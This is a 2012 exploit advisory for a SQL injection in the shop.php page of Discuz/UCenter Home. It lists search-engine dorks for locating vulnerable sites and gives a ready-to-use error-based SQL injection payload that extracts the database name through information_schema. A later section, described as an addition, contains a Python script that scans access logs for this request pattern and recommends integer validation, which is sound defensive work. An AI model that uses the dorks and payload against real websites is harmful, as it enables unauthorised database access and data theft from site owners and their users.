Discuz 7.X universal 0day vulnerability (UCenter Home-2.0)

2012-07-16
 
*/ Author : KnocKout
 */ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
 */ Contact: knockoutr@msn.com
 */ Cyber-Warrior.org/CWKnocKout
 Dork : Powered by UCenter inurl:shop.php?ac=view
 Dork 2 : inurl:shop.php?ac=view&shopid=
 Vuln file : Shop.php
 
===================================================================
 POC
 
shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,027,unhex(hex(database())),027,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
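
A defender-side check for this request pattern, as an added example that is not part of the original advisory: it scans web access logs for shop.php?ac=view requests whose shopid value is not a plain integer and records which SQL keywords appear in it. The combined log format, the sample lines, and the names scan, MARKERS and SAMPLE_LOG are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jul/2012:10:01:02 +0000] "GET /shop.php?ac=view&shopid=4 HTTP/1.1" 200 5120
203.0.113.9 - - [16/Jul/2012:10:01:07 +0000] "GET /shop.php?ac=view&shopid=4%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20floor(rand(0)*2)) HTTP/1.1" 200 812
203.0.113.9 - - [16/Jul/2012:10:01:09 +0000] "GET /shop.php?ac=view&shopid=7+AND+1=1 HTTP/1.1" 200 5120
198.51.100.2 - - [16/Jul/2012:10:02:00 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100
"""

# client IP, timestamp, request target
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Keywords typical of error-based SQL injection, checked after URL decoding.
MARKERS = ("select", "information_schema", "group by", "floor(rand(")


def scan(log_text):
    """Return one finding per shop.php?ac=view request with a non-integer shopid."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
        if params.get("ac", [""])[0] != "view":
            continue
        for value in params.get("shopid", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # a legitimate shop id is a plain integer
            hits = [k for k in MARKERS if k in value.lower()]
            findings.append({"ip": ip, "time": ts, "shopid": value, "markers": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["markers"], repr(f["shopid"]))
```

The same integer-only rule applied to shopid inside the application, before the value reaches a query, is what removes the injection point; the log scan only shows whether it has been probed.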